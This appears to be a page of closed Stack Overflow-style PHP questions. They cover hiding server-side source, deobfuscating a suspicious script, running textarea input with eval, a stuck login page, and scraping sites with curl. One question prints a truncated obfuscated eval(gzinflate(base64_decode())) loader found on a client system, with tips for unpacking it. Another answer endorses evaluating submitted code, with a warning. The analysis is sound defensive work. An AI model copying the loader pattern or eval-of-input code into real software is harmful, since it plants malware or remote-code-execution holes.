Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 6 years ago.
Improve this question
I want to make sure visitors to my site can't see the PHP code that's generating the page. Here is a reference: http://may.edu.np/tmp/
Can anyone explain to me how server-side scripts are interpreted and how the result is delivered to the end user?
If I understand your question correctly, no one should be able to access your source code so long as they don't have access to the server. When a browser makes a request for a .php file to the server, the server knows that it must first interpret the script and then send the output from your echo statements and/or inline HTML. As far as I know, there's no way for the user to "trick" the server into sending it as plain text, so I wouldn't worry about that. Also, as long as you disable error reporting, no one should even know you're running php, as there's no ".php" in the URL. Hope this helps :)
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I'm trying to de-obfuscate this script found on a client system with no luck so far.
<?php function LwAC($SvniN)
{
$SvniN=gzinflate(base64_decode($SvniN));
for($i=0;$i<strlen($SvniN);$i++)
{
$SvniN[$i] = chr(ord($SvniN[$i])-1);
}
return $SvniN;
}eval(LwAC("NL3XrutckqX7AAXUOyQadZEFokHv0KcuRFISRS+SotFBo0Ereu8b/ewnVtepvMhEZu5/7SXDOSNGjPHFP/7x96987ZKl7Lt/TJ9g/fzz3zxRfMj//q//8r//8a//8p//5T9+V9nlTbRk/4yjOWOo/5VmSZ9m//Vn//1//Ou//CPvp3/+W/kf2P/4t/L/mZepybr/+r/hf0EQ+IH/+N//9QP/338r/+c//uMfSTH9s5/S///P/f2P//7f8f/7w/4P/OkpW9ap+8d//gp/f8P/ybao+ed//pb/jbVwskGsZ10mOspw/JflJTfCCb8ZXr/yIfxkjbz17+It/MTCDBLTnXayuGWdQlpor9RekOIj40+rH+VWgrKzNk675Nj192nfY/QlCIrlsrmVo/xGWShjoR8BRRcU4bVhRcuAaLt4oJGsG3g0u2kCQWdHtO3dRHeTton5MTpat/c5msWKhKndxa7dIOOMsvtVuzvTy75zkWaMJErk3+WcuHGk9RxDX+JPf2UVXZzBUSSPXFZ5bew0JU+SOktF1d2a9czZqx6Iz+7lmzu5N1R+1YtFsDFNI0gYFII1BgFLZ+K25+xsoZmoPtXtmffjqHKrkK5YlTxz84dkKKq9WzRrR3YY2WhiWY7+OJMwkgjBrvxQ4Cj2TbftuM2a323oRsQpclb0klrwT7ouhhQ1mwsY//ff7x+BonLjgaYRJe0pfBzPpkcdLyCPh80zMcoifdaF95GRaRbhUH4v6KSIXiYRhHHbsN+rXZmp5SVUlmwDzy9HkAMvvdff/B2kH1o/kehjrCOaWbF2qd1EVtFb2+fs66Cvjd+1ZSU4ZPQSCjtR4SFXvGt7CPN9lZlInF8DQVH61dmpwvPO80hU7Y4ggePh5BtdNIyOyLeDRhNT7lWSKXXkPZOUM0jx9q7Yi1XxqjD6J/IlSfgxKrOneYyd7kGvi0cjG8umKGcxxiJNjGKZx+SRTZpr5HTBH49z9O8/vg9CyawztvoAV8k1tZ7O0XbR96LHE91ygorwn52StKO98l9NY7zFU2vzy8cpZZF2vlftkrmkfAW7s4prjfMckiy21XYab2GJhGZci7oIx0cVj+xr20h4iYV8tjwD4yCo60u6cVwhsfvIO46p0Y/WkjGPwj9Gfhqe893FniWX+nonTn7QjRqZCb4+Qsrz/GhZFEIt99Jy2BxFV/KT0gdKHg29GFmebyJDdA2G"));?>
Please note that I have to remove plenty of the codes before this "));?>
A very big thank you to everyone who took their time to go through this question and put in advice/direction in attempt to deobfuscate this PHP code. Special thanks to #Hasta Dhana.
Now, taking into consideration the recommendation of #digijay to do this on a virtual machine where it can simply be deleted if anything goes wrong, the use of an online php compiler as recommended and used by #Hasta Dhana was an awesome choice. All I had to do was to paste in the whole code, change the eval to echo and run it. That, successfully had the work done and pretty fast except that the output was however obfuscated in the exact same way. This time the solution is as simple as deobfuscate the output repeating the same actions that get us here. Which is to copy the whole of the output and change the eval in it to echo then run it and hurray there we have the script deobfuscated.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
I want to type php coding in textarea, then after submit it should run the php coding and produce result. Is this possible ?
To upload changes in live, I need to get two level approve, If any errors occur i could't fix it quickly, If above thing is possible I can enable error log, dynamically print array and so on...
Yes, you can POST value of textarea and then evaluate its content as PHP code using eval function, but make sure you restrict access to this feature, because it's very dangerous if you allow random people to use it. You can even simulate something like online php compiler using AJAX calls.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
I have a page that doesn't end to load. PHP max_execution_time is set to 30 but the icon in the Chrome tab doesn't end to turn. What tool I can use to find where the script is?
PHP log are clean, and this is a simple login page made using laravel.
I discover that problm are caused by cookie, in fact if I load page using Chrome hidden mode I have not the problem.
PHP max execution time is for PHP. There are several other things that have to process as well, like MySQL. The time it takes SQL to do stuff is not included in the PHP max execuion time. Beyond that, you'd have to show some code to figure out why.
To anwser your question, the browser is a pretty good tool for that. Or if a rewrite is hiding the filename you could grep for a unige string from the source, assuming you know which parts are PHP generated.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I'm learning php and website development in general. Currently I'm trying to write a script in php that would access a website as Internet Explorer (important) and look for a specified word/pattern everywhere possible. Simply parsing doesn't do the job.
The thing is, I can do that manually - I open website X and press F12 in Internet Explorer->debugging section and I search there. However I have no idea how to implement such a thing in php or any other language.
TL:DR
Need to extract data from a webpage the same way I do it manually (explained in paragraph above). However, simply parsing doesn't do the job. I need to achieve that in php or some other server side language.
In addition to limited approaches such as file_get_contents followed by a string search (or XML parser), you can look into more feature rich libraries such as the SimpleTest Scriptable Web Browser.
You'll want to modify the user agent string in order to simulate a request from Internet Explorer.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
I'm using php and curl to get the content of various websites. Some sites require post values. I want to check if the site expect any post values to be sent.
You cannot do that, unless sites specifically tell you in their response headers what they are expecting (and they rarely, if ever, do). Best you can do is take a look at returned headers from the request. You cannot automate this process.
Not entirely sure what you're asking here OP. But when creating scripts in cURL to automate interaction with other websites you generally have to investigate manually to find out what parameters need to be passed to get to the information you want...
It'll be a case of using tools such as Source Code View, and the firefox addon which allows you to modify post information (forgotten what its called) to see whats actually happening when you visit the site.